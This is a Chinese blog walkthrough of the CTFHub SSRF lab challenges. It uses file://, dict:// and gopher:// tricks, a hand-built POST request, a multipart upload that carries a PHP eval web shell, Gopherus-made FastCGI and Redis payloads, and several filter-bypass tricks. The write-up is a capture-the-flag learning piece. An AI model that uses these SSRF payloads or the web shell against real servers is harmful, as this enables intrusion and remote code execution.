CTFHUB-SSRF

最新推荐文章于 2024-08-27 16:35:27 发布
原创 最新推荐文章于 2024-08-27 16:35:27 发布 · 1.1k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

文章目录

内网访问

浏览器地址栏看到URL参数

image-20220624083243119

直接访问

image-20220624083308052

伪协议读取文件

使用file://伪协议读取位于/var/www/html路径下的flag.php

image-20220624083552292

查看页面源码

image-20220624083609969

端口扫描

端口扫描探测可以使用dict://伪协议,Burpsuite Intruder爆破,8408端口存在回显,为Apache服务

image-20220624084102053

http://协议访问8408端口

image-20220624084209319

POST请求

访问http://127.0.0.1/flag.php,得到一个输入框,查看页面源码得到Key

image-20220624100438494

image-20220624100451205

提交Key,提示来源不对

image-20220624100514086

想到主页面的url参数核gopher协议

访问http://127.0.0.1/flag.php,抓包,提交key

得到一个POST请求的数据包

image-20220624100655643

对其进行处理简化,得到如下内容:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
Connection: close
Upgrade-Insecure-Requests: 1

key=9ba06f09ff834cbe08595a9d51fae8bc

访问主页,抓包,修改url参数的值为payload。含义为:使用gopher协议访问127.0.0.1的80端口,并通过POST请求向flag.php提交内容。

image-20220624100848718

对POST的内容进行2次url编码,得到如下内容,然后forward转发。

image-20220624101031666

成功得到flag

image-20220624101056803

1. 构造的POST请求数据包需要删除多余字段,最少保留:Host、Content-Type、Content-Length
2. url二次编码的原因:?

上传文件

image-20220624162232988

修改前端,加Submit按钮

image-20220624162317283

BP开启抓包,上传文件并提交,得到文件上传的POST数据包

image-20220624162350984

数据包处理,得到:

POST /flag.php HTTP/1.1
Host: 127.0.0.1:80
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Content-Type: multipart/form-data; boundary=---------------------------36857471101661305322767988058
Content-Length: 381
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------36857471101661305322767988058
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream

<?php @eval($_POST[1]);?>
-----------------------------36857471101661305322767988058
Content-Disposition: form-data; name="submit"

鎻愪氦鏌ヨ
-----------------------------36857471101661305322767988058--

访问首页,抓包

image-20220624162453216

使用gopher协议

image-20220624162534447

二次URL编码

image-20220624162558864

image-20220624162620206

FastCGI

gophrus生成payload,页面使用index.php

image-20220624162908938

抓包访问首页,修改url参数内容;读取到根目录下存在flag文件

image-20220624163026016

image-20220624163038785

再次生成payload得到flag

image-20220624163150363

Redis

gopherus生成payload

python2 gopherus.py --exploit redis

image-20220624110247095

抓包提交请求,页面一直加载,但是此时已经成功写入webshell

image-20220624110413464

使用file协议或者http协议可以检查

image-20220624110508747

直接访问http://XXX/shell.php,不要通过伪协议访问,用hackbar或者蚁剑利用

image-20220624110638088

image-20220624110701008

URL Bypass

image-20220624160704280

使用@绕过

image-20220624160743496

image-20220624160752000

数字IP Bypass

image-20220624160904498

进制转换绕过

image-20220624161052492

image-20220624161102192

302跳转Bypass

非预期:进制转换、localhost

image-20220624161221196

环境好像有问题

DNS Rebind

https://lock.cmpxchg8b.com/rebinder.html

image-20220624161944593

image-20220624161954632

CTFhub-ssrf-POST请求
qq_51553814的博客
08-11 4359
CTFhub-ssrf-POST请求 解题 进入靶场,首先看到的是一片空白,没有任何返回,甚至看源码里面也没有任何东西 使用dirsearch扫描,扫出了一个文件/index.php 还有一个flag.php,我是在网上看WP才知道有这个文件,看了很多篇WP都没有说这个文件怎么来的,只是直接说发现了这个文件 现在先来看一看这两个文件吧 首先是flag.php文件,我们让url=127.0.0.1/flag.php,通过内网来访问就能直接访问到了,访问后是一个方框 再看源码发现,需要用post传输一个key
CTFHUB-SSRF-POST请求
qq_62078839的博客
04-23 1859
打开连接 尝试读取flag.php与index.php flag.php <?php error_reporting(0); if ($_SERVER["REMOTE_ADDR"] != "127.0.0.1") { echo "Just View From 127.0.0.1"; return; } $flag=getenv("CTFHUB"); $key = md5($flag); if (isset($_POST["key"]) && $_P...
ctfhub--ssrf
qq_44418229的博客
06-10 1296
ctfhub----ssrf笔记
CTFHUB SSRF POST小记
I_WORM的博客
02-02 1724
ctfhub ssrf post小记
CTFHub_Web_SSRF_POST
阿刁〇的博客
08-08 1136
CTFHub_Web_SSRF_POST 首先,简单来了解一下SSRF SSRF(server-side request forgery,服务端请求伪造),是一种由攻击者构造形 成由服务器发起请求的一个漏洞。让服务器去请求通常请求不到的东西。 一般用来在外网探测或攻击内网服务。 SSRF漏洞形成的原因多事服务端提供了从外部服务获取数据的功能,但没有对目标地址、协议等重要参数进行过滤和限制,从而导致攻击者可以自由构造参数,而发起预期外的请求 漏洞成因 相关函数 file_get_conte
CTFHUB-SSRF-FastCGI协议
weixin_68416970的博客
07-02 727
CTFHUB技能树、SSRF、FastCGI协议的通关教程
CTFHUB-SSRF-上传文件
weixin_68416970的博客
07-01 992
CTFHUB技能树、SSRF、上传文件的通关教程
ctfhub-web-SSRF通关攻略
2401_82451607的博客
08-27 2473
ctfhub-web-SSRF通关攻略
CTFHUB_SSRF_POST请求
m0_58788294的博客
07-29 429
【代码】CTFHUB_SSRF_POST请求。
CTFHUB SSRF
CN天狼
02-14 1479
CTFHUB SSRF post 上传文件 fastcgi Redis协议 URL Bypass 数字IP Bypass 302跳转 Bypass DNS重绑定 Bypass
CTFHUB-SSRF-POST请求(小宇特详解)
小宇的web博客
10-23 4232
CTFHUB-SSRF-POST请求 这里先说一下这里你需要知道的东西 而不是只会做题,不知道其所以然 这里我先说一下这里题里说的302跳转在这里发挥了什么作用 302跳转的302是http状态码 表示请求的网页自请求的网页移动到了新的位置,搜索引擎索引中保存原来的URL 这里可以通过访问302.php,并且传参gopher来伪造本地访问 Gopher 协议是 HTTP 协议出现之前,在 Internet 上常见且常用的一个协议。随着HTTP协议的壮大,Gopher协议已经慢慢的淡出了我们的视线,但是Gop
ctfhub---SSRF
tansty_zh的博客
09-10 2336
1.内网访问 直接访问127.0.0.1/flag.php 2.伪协议读取文件 可以使用php伪协议中的file协议 构造playload:file:///var/www/html/flag.php flag在源代码中 3.端口扫描 dict协议可以用来探测开放的端口 构造payload dict://127.0.0.1: 利用burpsuite进行爆破 得到开放的端口为8666 进行访问 得到flag ...
SSRF详解 基于CTFHub(上篇)
Bossfrank的博客
04-28 2408
本文简要介绍了SSRF服务端请求伪造的原理,并通过CTFHub的实例,介绍SSRF的基本原理、利用方式、绕过思路等。
CTFHub】WEB之SSRF(前四关)--内网访问、伪协议读取文件、端口扫描、post请求
weixin_57240513的博客
07-24 627
配置好后开始攻击,根据长度不同查看到端口为8965端口已经查出但是请求错误,怀疑是dirt://不可用然后改成http://后,成功拿到。
CTFHub技能树笔记之SSRF:POST请求、文件上传
weixin_48799157的博客
04-03 9919
知识点: 1.什么是gopher协议 1.Gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。 2.它只支持文本,不支持图像 3.Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。 2.gopher使用结
CTFHUB-WEB-SSRF【11】POST请求 上传文件 FastCGI协议 Redis协议
(∪.∪ )...zzz的博客
06-13 1074
!!!POST请求试一下`?url=file:///var/www/html/flag.php`根据提示从127.0.0.1 访问给服务器发送一个KEY,写POST包上传文件FastCGI协议Redis协议 POST请求 试一下?url=file:///var/www/html/flag.php 根据提示从127.0.0.1 访问 给服务器发送一个KEY,写POST包 <!-- Debug: key=a977f452523073d3d7d2fd8bd41b5331--> 这个是基础po
ctfhub技能树—ssrf
Naptmn的博客
02-16 618
文章目录1、内网访问 1、内网访问 内网访问要求我们从特定的服务器发送请求才能读取到信息,根据题目要求可以知道要求我们从127.0.0.1访问flag.php 打开题目之后可以看到网址上的url=_ 于是我们构造如下url即可得到flag ...
CTFHub(SSRF部分的WP)
分享与记录
11-09 1792
一、内网访问 直接访问flag.php 二、伪协议读取文件 因为网站的目录一般都在/var/www/html/,所以我们直接使用file伪协议访问flag.php就可以。在url中直接访问,这次就跟上一题不一样了,返回的不是flag而是???,应该是做了处理,所以使用burpsuite抓包查看 三、端口扫描 dict协议是一个字典服务器协议,通常用于让客户端使用过程中能够访问更多的字典源,在SSRF中如果可以使用此协议,就可以轻易获取目标服务器端口上运行的服务版本等信息(远程利用) 直接使用bu
CTFHub-Web ssrf post请求
最新发布
01-08
### CTFHub Web平台中的SSRF漏洞利用Post请求 #### SSRF漏洞概述 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种攻击方式,其中攻击者能够诱使服务器向任意URL发出HTTP请求。这种攻击可能让攻击者绕...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值